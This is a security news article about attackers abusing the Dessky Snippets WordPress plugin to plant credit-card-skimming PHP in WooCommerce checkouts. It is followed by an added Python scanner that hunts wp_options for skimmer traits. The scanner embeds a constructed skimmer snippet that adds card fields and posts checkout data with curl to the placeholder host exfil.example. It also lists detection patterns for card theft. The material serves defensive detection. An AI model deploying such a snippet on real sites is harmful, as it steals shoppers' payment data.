Unknown threat actors are abusing a little-known code snippet plugin for WordPress to inject malicious PHP code into victim sites that is capable of harvesting credit card data. The campaign, observed by Sucuri on May 11, 2024, involves the misuse of a WordPress plugin called Dessky Snippets, which allows users to add custom PHP code to their site. The plugin has more than 200 active installations.
Attacks of this kind are known to exploit previously disclosed flaws in WordPress plugins, or easily guessable credentials, to gain administrator access and then install other plugins (legitimate or otherwise) for post-exploitation. In this campaign, Sucuri said, the Dessky Snippets plugin is used to plant server-side PHP credit card skimming malware on compromised sites.
'This malicious code was saved in the dnsp_settings option in the WordPress wp_options table and was designed to modify the checkout process in WooCommerce and inject its own code,' said security researcher Ben Martin. Specifically, the code adds several new fields to the billing form that request names, addresses, credit card numbers, expiration dates, and Card Verification Value (CVV) numbers; the captured data is then exfiltrated to the URL 'hxxps://2of[.]cc/wp-content/'.
One notable aspect of the campaign is that the billing form associated with the fake overlay has browser autofill disabled (i.e. autocomplete='off'). 'By manually disabling this feature on the fake payment page, it reduces the likelihood of the browser alerting the user that sensitive information has been entered and ensures that fields remain blank until manually filled in by the user, which reduces the chance of them appearing suspicious and ensures that the fields appear as normal, required inputs for the transaction,' Martin explained.
This is not the first time that threat actors have resorted to using legitimate code snippet plugins for malicious purposes. Last month, the company revealed that the WPCode snippet plugin was being misused to inject malicious JavaScript code into WordPress sites, and showed that it was being used to redirect site visitors to VexTrio domains.
Another malware campaign called Sign1, which was found to have infected over 39,000 WordPress sites in the last six months, uses malicious JavaScript injections via the Simple Custom CSS and JS plugin to redirect users to fraudulent sites.
WordPress site owners, especially those offering e-commerce functions, are advised to keep their sites and plugins updated, use strong passwords, prevent brute-force attacks, and periodically check their sites for signs of malware or any unauthorized changes.
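The article names the exact place the skimmer lives (the dnsp_settings option in wp_options) and the traits that give it away: PHP stored in the database, a WooCommerce checkout hook, card-data field names, autocomplete="off" on the injected inputs, and an outbound request to a third-party URL. The following scanner turns those traits into a periodic check of the kind the advice above calls for. It is an added example, not code from the article or from Sucuri; the wp_options rows are constructed for the demo, the skimmer snippet is a constructed stand-in for the behaviour described (not the real payload), the exfiltration domain exfil.example and the option key names inside dnsp_settings are placeholders, and SQLite stands in for MySQL so the script runs offline.

```python
"""Hunt for card-skimming PHP stored in the WordPress wp_options table.

Added example: grades every option_value by the traits described in the
article.  All sample data below is constructed; exfil.example and the key
names inside dnsp_settings are placeholders, not real indicators.
"""
from __future__ import annotations

import re
import sqlite3

# Regexes run against the raw option_value, so PHP-serialized settings
# (a:1:{s:4:"code";s:...}) are covered without unserializing them.
INDICATORS = {
    "php_open_tag": re.compile(r"<\?php", re.I),
    "dynamic_eval": re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13|hex2bin)\s*\(", re.I),
    "outbound_request": re.compile(
        r"\b(curl_init|curl_exec|file_get_contents|wp_remote_(post|get|request)|fsockopen)\s*\(", re.I),
    "checkout_hook": re.compile(r"woocommerce_[a-z_]*(checkout|billing|review_order)[a-z_]*", re.I),
    "card_fields": re.compile(
        r"\b(cvv|cvc|cc_?num(ber)?|card_?number|exp(iry|iration)?_?(date|month|year))\b", re.I),
    "autocomplete_off": re.compile(r"autocomplete\s*=\s*['\"]?off", re.I),
    "external_url": re.compile(r"https?://[\w.-]+\.[a-z]{2,}(/[^\s'\"]*)?", re.I),
}


def scan_value(value: str) -> set[str]:
    """Return the names of every indicator that matches an option value."""
    return {name for name, rx in INDICATORS.items() if rx.search(value)}


def grade(hits: set[str]) -> str:
    """Map indicator hits to a verdict.

    skimmer    - hooks the checkout, names card fields and phones home
    suspicious - evaluates/decodes code, or collects card data and phones home
    code       - PHP (or a checkout hook) stored in the database: normal for a
                 snippet plugin, but every such row deserves a look
    clean      - nothing of interest
    """
    exfil = {"outbound_request", "external_url"}
    if "card_fields" in hits and "checkout_hook" in hits and hits & exfil:
        return "skimmer"
    if hits & {"dynamic_eval", "obfuscation"} or ("card_fields" in hits and hits & exfil):
        return "suspicious"
    if "php_open_tag" in hits or "checkout_hook" in hits:
        return "code"
    return "clean"


def php_serialize_strings(values: dict[str, str]) -> str:
    """Serialize a flat dict of strings the way PHP's serialize() does.

    Snippet plugins commonly persist settings as a serialized PHP array; the
    byte lengths must be exact or unserialize() rejects the value.  Nested
    values are out of scope here.
    """
    body = "".join(
        f's:{len(k.encode())}:"{k}";s:{len(v.encode())}:"{v}";' for k, v in values.items()
    )
    return f"a:{len(values)}:{{{body}}}"


# Constructed stand-in for the behaviour the article describes: extra billing
# fields with autocomplete off, posted to a third-party URL on checkout.
# woocommerce_after_checkout_billing_form / woocommerce_checkout_process are
# real WooCommerce hooks; exfil.example is a placeholder domain.
SKIMMER_SNIPPET = (
    "<?php\n"
    "add_action('woocommerce_after_checkout_billing_form', function () {\n"
    "  echo '<input type=\"text\" name=\"cc_number\" autocomplete=\"off\">';\n"
    "  echo '<input type=\"text\" name=\"expiry_date\" autocomplete=\"off\">';\n"
    "  echo '<input type=\"text\" name=\"cvv\" autocomplete=\"off\">';\n"
    "});\n"
    "add_action('woocommerce_checkout_process', function () {\n"
    "  $ch = curl_init('https://exfil.example/wp-content/');\n"
    "  curl_setopt($ch, CURLOPT_POST, true);\n"
    "  curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($_POST));\n"
    "  curl_exec($ch);\n"
    "});\n"
)

# Constructed wp_options rows: two ordinary settings, one benign snippet
# (hypothetical option name), and the option the article names.
SAMPLE_ROWS = [
    ("siteurl", "https://shop.example", "yes"),
    ("woocommerce_currency", "USD", "yes"),
    ("legit_snippet_settings", php_serialize_strings(
        {"code": "<?php add_filter('wp_mail_from_name', function () { return 'Shop'; });"}), "yes"),
    ("dnsp_settings", php_serialize_strings(
        {"code": SKIMMER_SNIPPET, "enabled": "1"}), "yes"),  # key names are assumptions
]


def build_demo_db() -> sqlite3.Connection:
    """Create an in-memory stand-in for wp_options filled with SAMPLE_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, "
        "option_name TEXT UNIQUE, option_value TEXT, autoload TEXT)"
    )
    conn.executemany(
        "INSERT INTO wp_options (option_name, option_value, autoload) VALUES (?, ?, ?)",
        SAMPLE_ROWS,
    )
    return conn


def scan_wp_options(conn: sqlite3.Connection, table: str = "wp_options") -> dict[str, dict]:
    """Scan every row; return {option_name: {verdict, hits}} for non-clean rows."""
    if not re.fullmatch(r"[A-Za-z0-9_]+", table):  # table prefix comes from config, still validate
        raise ValueError(f"refusing unsafe table name: {table!r}")
    findings: dict[str, dict] = {}
    for name, value in conn.execute(f"SELECT option_name, option_value FROM {table}"):
        hits = scan_value(value or "")
        verdict = grade(hits)
        if verdict != "clean":
            findings[name] = {"verdict": verdict, "hits": sorted(hits)}
    return findings


if __name__ == "__main__":
    for name, info in scan_wp_options(build_demo_db()).items():
        print(f"{info['verdict']:10} {name}: {', '.join(info['hits'])}")
```

Against a live site, replace build_demo_db() with a connection to the real database (pymysql or mysql-connector) and pass the site's actual table prefix. Expect some tuning: payment-gateway settings legitimately mention card field names and URLs, which is why the "skimmer" verdict also requires a checkout hook, and snippet plugins that store code without a <?php tag will only surface through the other indicators. Every "code" row is worth reading regardless of verdict, since an attacker with admin access can store whatever they like there.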
Source : https://thehackernews.com/2024/05/wordpress-plugin-exploited-to-steal.html
Disclaimer:
This news article is for informational purposes only and has been prepared with the aim of increasing awareness against attacks and taking precautions accordingly. We remind you that it is not legal to use the information in this article for purposes other than its intended purpose, and we recommend that you apply it in your test environments beforehand. Otherwise, we declare that CyberArts has no responsibility for any errors, omissions or malfunctions that may arise in your systems due to this situation, and cannot be held responsible for any direct or indirect damages or losses that may arise therefrom.